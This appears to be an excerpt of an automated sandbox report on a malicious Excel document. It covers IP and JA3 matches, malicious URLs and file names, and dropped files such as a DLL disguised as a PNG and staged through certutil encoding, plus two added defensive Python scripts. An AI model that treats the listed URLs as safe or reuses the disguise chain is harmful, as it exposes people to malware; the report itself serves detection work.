• https://www.solarwinds.com/systems-management-bundle/registration?CMP=BIZ-EDM-520-SW_NA_X_RR_PPD_LD_EN_SYSMBG_X-XSYS-REG-2020 (malicious; 45.33.3.7)
• 7mB0FoVcSn.exe (malicious; 192.155.90.90)
• xLH4kwOjXR.exe (malicious; 172.105.196.152)

YAHOO-3 (US)
• Consignment Document PL&BL Draft.exe (malicious; 67.195.197.25)
• bpW4Utvn8eAozb4.exe (malicious; 67.195.197.25)
• https://cypressbayhockey.com/NO (malicious; 76.13.32.146)
• MDYL rj0810666.doc (malicious; 67.195.197.25)
• Invoice S2517158.doc (malicious; 67.195.197.25)
• document.xlsb (malicious; 74.6.143.25)
• http://confidentcaredentistry.com/cgi-bin/byph0sw1v-0006356/ (malicious; 67.195.197.25)
• http://confidentcaredentistry.com/cgi-bin/byph0sw1v-0006356/ (malicious; 67.195.197.25)
• Document_7647.xlsb (malicious; 74.6.143.26)
• Document_7647.xlsb (malicious; 74.6.143.26)
• https://performoverlyrefinedapplication.icu/CizCEYfXXsFZDea6dskVLfEdY6BHDc59rTngFTpi7WA?clck=d1b1d4dc-5066-446f-b596-331832cbbdd0&sid=l84343 (malicious; 67.195.176.40)
• Invoice_52133.xls (malicious; 74.6.143.26)
• 28YPAd8yWe.exe (malicious; 67.195.197.25)
• EME_PO.47563.xlsx (malicious; 67.195.197.25)
• 7OKYiP6gHy.exe (malicious; 67.195.197.25)
                                                                                                                                                                                                          8miw6WNHCt.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          • 74.6.136.150
                                                                                                                                                                                                          0P0cZbXEbK.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          • 67.195.204.75
                                                                                                                                                                                                          uvjAwriS1c.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          • 67.195.204.80
                                                                                                                                                                                                          ZYhucZndrm.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          • 67.195.204.77
                                                                                                                                                                                                          Zped7c3dam.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          • 67.195.204.77
Match: YAHOO-IRDGB

Associated Sample Name / URL | Detection | Context
https://1drv.ms:443/o/s!BAXL7VqGJe6lg0eKk2MZcT_c29ga?e=Qdftz9F3oESsQIuV76Ppsw&at=9 | malicious | 212.82.100.181
http://search.hwatchtvnow.co | malicious | 212.82.100.176
details.html | malicious | 212.82.100.181
http://search.hwatchtvnow.co | malicious | 212.82.100.176
https://www.canva.com/design/DAESYWKuLHs/avvDNRvDuj_tk82H9Q45ZQ/view?utm_content=DAESYWKuLHs&utm_campaign=designshare&utm_medium=link&utm_source=sharebutton | malicious | 212.82.100.181
details.html | malicious | 212.82.100.181
http://getfreshnews.com/nuoazaojrnvenpyxyse | malicious | 212.82.100.176
https://www.canva.com/design/DAERo5igDNg/4RY_OP3NTUsbjoalCMtZLQ/view?utm_content=DAERo5igDNg | malicious | 212.82.100.181
Statement_1472621419.xls | malicious | 87.248.100.215
Statement_1472621419.xls | malicious | 87.248.100.214
Statement_1472621419.xls | malicious | 87.248.100.215
document.xlsb | malicious | 87.248.100.215
document.xlsb | malicious | 87.248.100.216
document.xlsb | malicious | 87.248.100.215
Document_8297.xlsb | malicious | 87.248.100.215
Document_8297.xlsb | malicious | 87.248.100.215
Document_8297.xlsb | malicious | 87.248.100.216
Document_7647.xlsb | malicious | 87.248.100.215
Document_7647.xlsb | malicious | 87.248.100.215
Document_7647.xlsb | malicious | 87.248.100.215

JA3 Fingerprints

Match: 37f463bf4616ecd445d4a1937da06e19

Associated Sample Name / URL | Detection | Context
agenciatributaria5668.vbs | malicious | 87.248.100.215, 74.6.143.26
SecuriteInfo.com.Generic.mg.5064de995195186f.exe | malicious | 87.248.100.215, 74.6.143.26
_#Ud83d#Udcde_frances@viaseating.com.htm | malicious | 87.248.100.215, 74.6.143.26
rec6424.xls | malicious | 87.248.100.215, 74.6.143.26
Receipt.3656.xls | malicious | 87.248.100.215, 74.6.143.26
INV 5593.xls | malicious | 87.248.100.215, 74.6.143.26
IRS_Covid-19_Relief_Payment_Notice_pdf.exe | malicious | 87.248.100.215, 74.6.143.26
Qt_1186.xls | malicious | 87.248.100.215, 74.6.143.26
INV-4215.xls | malicious | 87.248.100.215, 74.6.143.26
wp-cryn.dll | malicious | 87.248.100.215, 74.6.143.26
P8ob8zaRpi.exe | malicious | 87.248.100.215, 74.6.143.26
Jcantele.HTM | malicious | 87.248.100.215, 74.6.143.26
Payment Confirmation Paper - Customer Copy_pdf.exe | malicious | 87.248.100.215, 74.6.143.26
1_cr.exe | malicious | 87.248.100.215, 74.6.143.26
Symptomaticshon5.exe | malicious | 87.248.100.215, 74.6.143.26
1_cr.exe | malicious | 87.248.100.215, 74.6.143.26
PO-00172020.html | malicious | 87.248.100.215, 74.6.143.26
atikmdag-patcher 1.4.7.exe | malicious | 87.248.100.215, 74.6.143.26
Dboom.HTM | malicious | 87.248.100.215, 74.6.143.26
vS8yVO8py0.exe | malicious | 87.248.100.215, 74.6.143.26
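A JA3 value is the MD5 of the parameters a client advertises in its TLS ClientHello (protocol version, cipher suites, extension types, supported groups and EC point formats), so one fingerprint recurs across many unrelated samples that share a TLS stack, as the table above shows. The parser below is an added example, not Joe Sandbox code, and it runs on a ClientHello constructed in the script rather than on this sample's traffic; it shows which fields go into the string and why RFC 8701 GREASE values must be stripped before hashing, since a client that rotates GREASE would otherwise produce a different hash on every connection.

```python
"""JA3 fingerprint from a raw TLS ClientHello (added example, not Joe Sandbox code)."""
import hashlib
import struct


def is_grease(v: int) -> bool:
    """RFC 8701 GREASE values (0x0a0a, 0x1a1a, ... 0xfafa) are random per client and excluded from JA3."""
    return (v & 0x0f0f) == 0x0a0a and (v >> 8) == (v & 0xff)


def ja3_from_client_hello(record: bytes):
    """Parse a TLS record carrying a ClientHello; return (ja3_string, ja3_md5).

    JA3 = MD5("SSLVersion,Ciphers,Extensions,EllipticCurves,EllipticCurvePointFormats"),
    each list dash-joined in wire order with GREASE values removed.
    """
    if not record or record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    hs = record[5:]
    if not hs or hs[0] != 0x01:
        raise ValueError("not a ClientHello")
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
    pos = 0
    version = struct.unpack_from("!H", body, pos)[0]; pos += 2
    pos += 32                                   # client random
    pos += 1 + body[pos]                        # session id (length-prefixed)
    cs_len = struct.unpack_from("!H", body, pos)[0]; pos += 2
    ciphers = [c for c in struct.unpack_from(f"!{cs_len // 2}H", body, pos) if not is_grease(c)]
    pos += cs_len
    pos += 1 + body[pos]                        # compression methods (length-prefixed)
    exts, groups, formats = [], [], []
    if pos < len(body):                         # the extensions block is optional
        end = pos + 2 + struct.unpack_from("!H", body, pos)[0]; pos += 2
        while pos < end:
            etype, elen = struct.unpack_from("!HH", body, pos); pos += 4
            edata = body[pos:pos + elen]; pos += elen
            if is_grease(etype):
                continue
            exts.append(etype)
            if etype == 10:                     # supported_groups (elliptic curves)
                glen = struct.unpack_from("!H", edata, 0)[0]
                groups = [g for g in struct.unpack_from(f"!{glen // 2}H", edata, 2) if not is_grease(g)]
            elif etype == 11:                   # ec_point_formats
                formats = list(edata[1:1 + edata[0]])
    dash = lambda xs: "-".join(str(x) for x in xs)
    ja3 = f"{version},{dash(ciphers)},{dash(exts)},{dash(groups)},{dash(formats)}"
    return ja3, hashlib.md5(ja3.encode()).hexdigest()


def build_client_hello(version: int, ciphers, extensions) -> bytes:
    """Serialise a ClientHello (constructed test input, not a real capture).
    extensions is a list of (type, raw_data) pairs in wire order."""
    body = struct.pack("!H", version) + bytes(32) + b"\x00"      # version, random, empty session id
    body += struct.pack("!H", 2 * len(ciphers)) + b"".join(struct.pack("!H", c) for c in ciphers)
    body += b"\x01\x00"                                           # one compression method: null
    ext_bytes = b"".join(struct.pack("!HH", t, len(d)) + d for t, d in extensions)
    body += struct.pack("!H", len(ext_bytes)) + ext_bytes
    hs = b"\x01" + len(body).to_bytes(3, "big") + body            # handshake type 1 + 24-bit length
    return b"\x16\x03\x01" + struct.pack("!H", len(hs)) + hs      # record type 22, TLS 1.0 legacy version


def supported_groups(groups) -> bytes:
    return struct.pack("!H", 2 * len(groups)) + b"".join(struct.pack("!H", g) for g in groups)


def ec_point_formats(fmts) -> bytes:
    return bytes([len(fmts)]) + bytes(fmts)


# Constructed ClientHello with GREASE in the cipher list, extension list and groups.
SAMPLE_HELLO = build_client_hello(
    0x0303,
    [0x0a0a, 0xc02b, 0xc02f, 0x1301],
    [
        (0x2a2a, b"\x00"),                          # GREASE extension
        (0, b"\x00\x0a\x00\x00\x07example"),        # server_name (payload does not enter JA3)
        (10, supported_groups([0x0a0a, 29, 23, 24])),
        (11, ec_point_formats([0])),
        (13, b"\x00\x04\x04\x03\x08\x04"),          # signature_algorithms
    ],
)

# The same client with GREASE removed: JA3 must be identical.
SAMPLE_HELLO_NO_GREASE = build_client_hello(
    0x0303, [0xc02b, 0xc02f, 0x1301],
    [(0, b"\x00\x0a\x00\x00\x07example"), (10, supported_groups([29, 23, 24])),
     (11, ec_point_formats([0])), (13, b"\x00\x04\x04\x03\x08\x04")],
)

if __name__ == "__main__":
    ja3, digest = ja3_from_client_hello(SAMPLE_HELLO)
    print(ja3)      # 771,49195-49199-4865,0-10-11-13,29-23-24,0
    print(digest)
```

Two caveats when using the value in a detection: JA3 identifies the TLS library and its configuration, not the malware, so a match against the table above is a pivot for hunting rather than a verdict on its own; and a server-side capture must take the ClientHello from the first record of the connection, before any retry, because a HelloRetryRequest can change the second ClientHello.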

Dropped Files

No context

Created / dropped Files

C:\ProgramData\ioq\ioq.dll
Process: C:\Windows\SysWOW64\rundll32.exe
File Type: HTML document, UTF-8 Unicode text, with very long lines
Category: dropped
Size (bytes): 428729
Entropy (8bit): 5.64278649126616
Encrypted: false
SSDEEP: 6144:s4iOhPcWRSMyXFkdQa4dJiAJW28pj/feyj4NI:l4JiAh8pDmw4NI
MD5: E469B3F4560C2C5BABCC295074BBC105
SHA1: 941D12A80A62835D3FFF589030E467527E3BC6AA
SHA-256: 23AA1F38F37A85AFDD5B39635E250AC90D194C9F07D93189F45DE72D99FA2580
SHA-512: DE95815D4B02682731A22A017BA0058FD8662563E728ABABCA2258616854CAD02F6DA39BD628A1C70100A853EC68442795B0CBC966C7392DF68866EC51695DB2
Malicious: false
Reputation: low
Preview: <!DOCTYPE html>.<html id="atomic" lang="en-US" class="atomic ua-ie ua-win ua-10.0 ua-ie7 l-out Pos-r https fp fp-default mini-uh-on uh-topbar-on ltr desktop Desktop bktFPTRELUG105">.<head>. <meta http-equiv="X-UA-Compatible" content="IE=edge">. . <title>Yahoo</title><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="//s.yimg.com"><link rel="preconnect" href="//s.yimg.com"><link rel="dns-prefetch" href="//search.yahoo.com"><link rel="preconnect" href="//search.yahoo.com"><link rel="dns-prefetch" href="//csc.beap.bc.yahoo.com"><link rel="preconnect" href="//csc.beap.bc.yahoo.com"><link rel="dns-prefetch" href="//geo.yahoo.com"><link rel="preconnect" href="//geo.yahoo.com"><link rel="dns-prefetch" href="//video-api.yql.yahoo.com"><link rel="preconnect" href="//video-api.yql.yahoo.com"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="the
                                                                                                                                                                                                          C:\Users\Public\94101.png
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\certutil.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):39256
                                                                                                                                                                                                          Entropy (8bit):6.299826299621766
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:OkrdE+NfoHHH0CZK0HOgGaFZqA6duOtT+/HHHPbMXJVs4RtmfZIO8ZpHSGAp9E+P:OkdE+tCU+OJAIddIbgVfRu1iRGp9E+hd
                                                                                                                                                                                                          MD5:E8B9879960665B995536C2EA54781ED8
                                                                                                                                                                                                          SHA1:D47FB2F7545CA519E1B22CD8AD28C5820F80F42E
                                                                                                                                                                                                          SHA-256:E3E2C9CF1CD955DB5DF06E78956B437006A11BE15059D6A5922DF5B7107F00EE
                                                                                                                                                                                                          SHA-512:E865C973CDD99DD221A86FB14E78F9423F3A2FDC0C6B73C5FE24FE6FEC13AC7165AE02441CA1D28ABDCDB55511861A55E3D5F55234E746CDB3962C2240E1E24E
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 36%
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`...........!...2.B...@...............`......................................oG.........................................d.......................X.......$.......................................................d............................text....A.......B.................. ..`.rdata...4...`...6...F..............@..@.data...@............|..............@....reloc..$...........................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          C:\Users\Public\94101.png2
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\certutil.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):78512
                                                                                                                                                                                                          Entropy (8bit):3.620703469882372
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:LI4jmeTNzBxB8qJVG+uEsz9m5hvIrPBxBWtA5huRMu/Z62iZVTlpq:8qTbK+u1z9m5h9OQ62sVBpq
                                                                                                                                                                                                          MD5:DDFD1FC00F13533F0955347A8F72CE8B
                                                                                                                                                                                                          SHA1:90EFAB08F39ED2271290DB9A23DF2B5C8B7BB912
                                                                                                                                                                                                          SHA-256:A6B3EAB77666F4B07617F39882E2BAAC73BF2133611D9D96D1D45E28F298D57A
                                                                                                                                                                                                          SHA-512:EABE853814794F1609A51DE756BFB1F161CD8577BE200901D48FB8C9029216B68F2D924F96366EA496F234C0FE7AD49B88BAD72672888BE656A78406DB00DFCD
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                          • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: C:\Users\Public\94101.png2, Author: Florian Roth
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview:
                                                                                                                                                                                                          C:\Users\Public\94101.txt
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):104692
                                                                                                                                                                                                          Entropy (8bit):4.688538408578286
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:bWCif3z4LzY4wPLydHLw4Qt1DU1t+X2Rzm:b/if3IgzydHLw4j1Pzm
                                                                                                                                                                                                          MD5:F5C5C04A0FE77F5961DE1436BE716180
                                                                                                                                                                                                          SHA1:4C0ED3D03181CDE19A1DFD7D577E776CC5A4DE4E
                                                                                                                                                                                                          SHA-256:18F5D2868DAA0CB4FE4CE7038330594AA9EB82CED3E50A07718218ADEA7449D4
                                                                                                                                                                                                          SHA-512:3E4E677523D1FDB1714D26284021F9DA0FC4791B7F1F8D2721DE956434F9DD8A4909B1DF533134C6620A70728025F34ABDEFE2603400E8417C7C13B210554E21
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview:
                                                                                                                                                                                                          C:\Users\Public\94101.xls
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):104692
                                                                                                                                                                                                          Entropy (8bit):4.688538408578286
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:bWCif3z4LzY4wPLydHLw4Qt1DU1t+X2Rzm:b/if3IgzydHLw4j1Pzm
                                                                                                                                                                                                          MD5:F5C5C04A0FE77F5961DE1436BE716180
                                                                                                                                                                                                          SHA1:4C0ED3D03181CDE19A1DFD7D577E776CC5A4DE4E
                                                                                                                                                                                                          SHA-256:18F5D2868DAA0CB4FE4CE7038330594AA9EB82CED3E50A07718218ADEA7449D4
                                                                                                                                                                                                          SHA-512:3E4E677523D1FDB1714D26284021F9DA0FC4791B7F1F8D2721DE956434F9DD8A4909B1DF533134C6620A70728025F34ABDEFE2603400E8417C7C13B210554E21
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview:
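The three files under C:\Users\Public listed above form one decode chain, and the sizes on this page pin down its shape: 94101.png2 is 78512 bytes, exactly twice the 39256-byte PE32 DLL written as 94101.png, and its entropy of 3.62 bits per byte sits under the 4-bit ceiling of hex text, so the last certutil step decodes hex. 94101.txt, the 104692-byte text Excel wrote first, is consistent with a base64 layer around that hex (78512 x 4/3 rounds to 104684 characters, the remainder being line terminators). Which certutil switch produced which file is not shown in this section; the hex layer is an inference from these numbers, not a quoted command line. The following Python script, added here as an example and not part of the Joe Sandbox report, reproduces that chain: it peels base64 and hex layers until a PE appears, computes the same 8-bit entropy the Entropy field reports, and flags the extension/content mismatches the report raises (a PE inside a .png, encoded text inside a .xls). The payload it works on is a constructed MZ-headed blob, not the real 94101.png.

```python
"""
Peel certutil-style encoding layers (base64 text -> hex text -> PE) and flag
dropped files whose content does not match their extension.

Added example for this analysis page; not Joe Sandbox code. The sample chain
at the bottom is constructed and only mimics a PE header.
"""
import base64
import binascii
import math
import ntpath
import re

_LINE_ENDS = re.compile(rb"[\r\n]")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, the same 8-bit measure the report's Entropy field uses."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def sniff(data: bytes) -> str:
    """Classify content by magic bytes or character class, ignoring the file name."""
    if data.startswith(b"MZ"):
        return "pe"
    if data.startswith(b"\x89PNG\r\n\x1a\n"):
        return "png"
    if data.startswith(b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"):
        return "ole"  # legacy .xls/.doc compound-file container
    if data.startswith(b"PK\x03\x04"):
        return "zip"  # .xlsb/.xlsx/.docx container
    body = _LINE_ENDS.sub(b"", data)
    # hex is tested first: every hex string is also valid base64 alphabet
    if body and len(body) % 2 == 0 and re.fullmatch(rb"[0-9A-Fa-f]+", body):
        return "hex"
    if body and len(body) % 4 == 0 and re.fullmatch(rb"[A-Za-z0-9+/]+={0,2}", body):
        return "base64"
    if all(32 <= b < 127 or b in b"\t\r\n" for b in data):
        return "text"
    return "binary"


def peel(data: bytes, max_layers: int = 4) -> list:
    """Decode base64/hex layers until something that is not an encoding remains.
    Returns [(kind, payload), ...] from outermost to innermost."""
    layers = []
    cur = data
    for _ in range(max_layers):
        kind = sniff(cur)
        layers.append((kind, cur))
        body = _LINE_ENDS.sub(b"", cur)  # certutil output carries CRLF line breaks
        if kind == "base64":
            cur = base64.b64decode(body, validate=True)
        elif kind == "hex":
            cur = binascii.unhexlify(body)
        else:
            break
    return layers


def layer_kinds(data: bytes) -> list:
    return [kind for kind, _ in peel(data)]


# What each extension may legitimately contain; anything else is a mismatch.
_ALLOWED = {
    ".png": {"png"},
    ".txt": {"text", "hex", "base64"},
    ".xls": {"ole"},
    ".xlsb": {"zip"},
    ".dll": {"pe"},
    ".exe": {"pe"},
}


def extension_mismatch(path: str, data: bytes) -> bool:
    """True when the sniffed content is not something this extension should hold."""
    ext = ntpath.splitext(path)[1].lower()  # handles Windows paths on any host
    allowed = _ALLOWED.get(ext)
    return allowed is not None and sniff(data) not in allowed


# Constructed sample chain (not the real dropped files): fake DLL -> hex -> base64
FAKE_DLL = b"MZ\x90\x00" + bytes(range(256)) * 4 + b"This program cannot be run in DOS mode"
STAGE_HEX = binascii.hexlify(FAKE_DLL)  # like 94101.png2: hex, no line terminators
_b64 = base64.b64encode(STAGE_HEX)
STAGE_B64 = b"\r\n".join(_b64[i:i + 64] for i in range(0, len(_b64), 64)) + b"\r\n"  # like 94101.txt

if __name__ == "__main__":
    for kind, blob in peel(STAGE_B64):
        print(f"{kind:7s} size={len(blob):6d} entropy={shannon_entropy(blob):.2f}")
    for name, blob in (("94101.png", FAKE_DLL), ("94101.xls", STAGE_B64), ("94101.txt", STAGE_B64)):
        print(name, "MISMATCH" if extension_mismatch(name, blob) else "ok")
```

Run as a script it prints one line per decoded layer with its size and entropy, then a verdict for each constructed file name; to apply the same check to a real dropped file, pass its bytes to peel() and extension_mismatch(). Sniffing hex before base64 matters: a hex blob passes the base64 alphabet test, and decoding it as base64 would yield garbage rather than the PE.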
                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\14A1215A-380B-45DE-AA00-CCD0BB357790
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):132942
                                                                                                                                                                                                          Entropy (8bit):5.372907002637865
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:0cQceNgaBtA3gZw+pQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:KrQ9DQW+zBX8P
                                                                                                                                                                                                          MD5:601C9A16FE13D2F2D096938345DB8540
                                                                                                                                                                                                          SHA1:11FDAAA63703A3E80480791729D1DF5F90A00A38
                                                                                                                                                                                                          SHA-256:012DE51939AA229CFF708A373DE49A6985400142EDE518618AD506679B4D35B2
                                                                                                                                                                                                          SHA-512:B3E12A48236E8B35B960E28F939C53350CD8723B6595DD08BFFE990B3143229736B2B755E343796347704151EB1E26553ECA302F590562A9BEABCA133B7B91D7
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-01-20T13:02:50">.. Build: 16.0.13718.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\C4803565.png
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          File Type:PNG image data, 847 x 510, 8-bit colormap, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):68160
                                                                                                                                                                                                          Entropy (8bit):7.986158472858729
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:j7xVUSqNWeAGoFARdxULAZAiamMA5uAUNyAzm83xQGaM0sP:/sUtFARPULAZemMA5uAgz3xQGaI
                                                                                                                                                                                                          MD5:0C491404AFF12DE1662733C17C9E9ADB
                                                                                                                                                                                                          SHA1:309DAAD58B5F00B063372165DE838E9B60FEE879
                                                                                                                                                                                                          SHA-256:86A81B1E4A8CC589CA3D7E855BF5E80486C4C33D8633A8D9488AF8D98919F5DA
                                                                                                                                                                                                          SHA-512:CE9DA288411F6EC8124397A7E3DA7BE53A98C338E4E34B3AA0B7C78D20F3297F72755F520308C324CED1C560173D43966B569D25F57DFC67A3A898997FDE8A01
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                                                          Preview: .PNG........IHDR...O.........s.......gAMA......a.....sRGB........nPLTE............................................................................................................................................................................................//....654...''&<<:......AA=.........NNM]]]!!.DCC......GGFWWVQQQppp......www...ddc.....JJIjji......~~}...10.HF>>=-...XVB........LK3...caJ{{_..........u..............e.`B....tRNS....@@.....7.....ZIDATx....8...b..o..<.7..:H.h7.F...ec.6!........}&..\..Q...rqT.)....o$........H..G..O$..D".O$..D"..'..x"..'..D<.H...D<.H...D".H$.D".H$..D".O$..D".O$..x"..'..x".H...D<.H...D<.H$.D".H$.D".O$...+..'IY>]K.4y.'.O..H@:M...5L~~.t...4..O....'..?2L...Q..Ct........|..GvZ...s....x...2.P.BJ......u..$.i....,+....Bp.......My.gY.e.t....tY..8....u........l.2)0.E.O..R.ta.]f.,..u..y..p..U.!r"..].i....5,../..1...D....f:..,y\Sv...-.....<s...yN.B<}.+.h>.%....N...:.4/...&..e.&.R.1....E!s..I]..NdY............/a..+v..u..N|.
                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\9J0CLPJO.htm
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):428729
                                                                                                                                                                                                          Entropy (8bit):5.64278649126616
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:s4iOhPcWRSMyXFkdQa4dJiAJW28pj/feyj4NI:l4JiAh8pDmw4NI
                                                                                                                                                                                                          MD5:E469B3F4560C2C5BABCC295074BBC105
                                                                                                                                                                                                          SHA1:941D12A80A62835D3FFF589030E467527E3BC6AA
                                                                                                                                                                                                          SHA-256:23AA1F38F37A85AFDD5B39635E250AC90D194C9F07D93189F45DE72D99FA2580
                                                                                                                                                                                                          SHA-512:DE95815D4B02682731A22A017BA0058FD8662563E728ABABCA2258616854CAD02F6DA39BD628A1C70100A853EC68442795B0CBC966C7392DF68866EC51695DB2
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview: <!DOCTYPE html>.<html id="atomic" lang="en-US" class="atomic ua-ie ua-win ua-10.0 ua-ie7 l-out Pos-r https fp fp-default mini-uh-on uh-topbar-on ltr desktop Desktop bktFPTRELUG105">.<head>. <meta http-equiv="X-UA-Compatible" content="IE=edge">. . <title>Yahoo</title><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="//s.yimg.com"><link rel="preconnect" href="//s.yimg.com"><link rel="dns-prefetch" href="//search.yahoo.com"><link rel="preconnect" href="//search.yahoo.com"><link rel="dns-prefetch" href="//csc.beap.bc.yahoo.com"><link rel="preconnect" href="//csc.beap.bc.yahoo.com"><link rel="dns-prefetch" href="//geo.yahoo.com"><link rel="preconnect" href="//geo.yahoo.com"><link rel="dns-prefetch" href="//video-api.yql.yahoo.com"><link rel="preconnect" href="//video-api.yql.yahoo.com"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="the
                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\A7810000
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):115300
                                                                                                                                                                                                          Entropy (8bit):7.940160209054297
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3072:WktzG/asUtFARPULAZemMA5uAgz3xQGan:WCG/SFAeErgzBQGU
                                                                                                                                                                                                          MD5:648087C71BCC1624A0D679BD5658E2CA
                                                                                                                                                                                                          SHA1:2283CDB627CDC8C4D874BAD8766CF6F1EA6B0EEC
                                                                                                                                                                                                          SHA-256:1DC278312F72E0059624451612D8973A07CBC5D8D6C73E151ACD027723721E01
                                                                                                                                                                                                          SHA-512:05061348772DD12747D02E991C036FD37BDEE1ACDCAC6345114B8BDC5F54732DFAD0BDADE457162AAA2463DF8EBB17F29B31CF8F632AE6479C32FE6C3FFFE09D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview: .U.N.1..W.;.|.v.(.*...J.-R....$....1..=c'..B.(..e....3.._,...1R.]+N....).{7k....wQQ...x..X"....O.e@....]J.\JR.Z...t.3..B..8....f(OG.oRy..:e.1...).T]-xy.$....W.T+z..y]nED4...!.^A..{._....F.3......7...KO........X]CL...s.0.......f7Ivi..B.P....*.+...y.z..p.RA.,..;$_....i.P{ug9L......5M.I........A|..'.%..M.MN.C..?q)@Y..g`.....4HG~...r......h...s...:.C. ...}M4..\.H.<......}.F]v\.......}.......q..O=(...D.S......o....|c.-W..-K..<.......PK..........!.l.......#.......[Content_Types].xml ...(..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\94101.txt.LNK
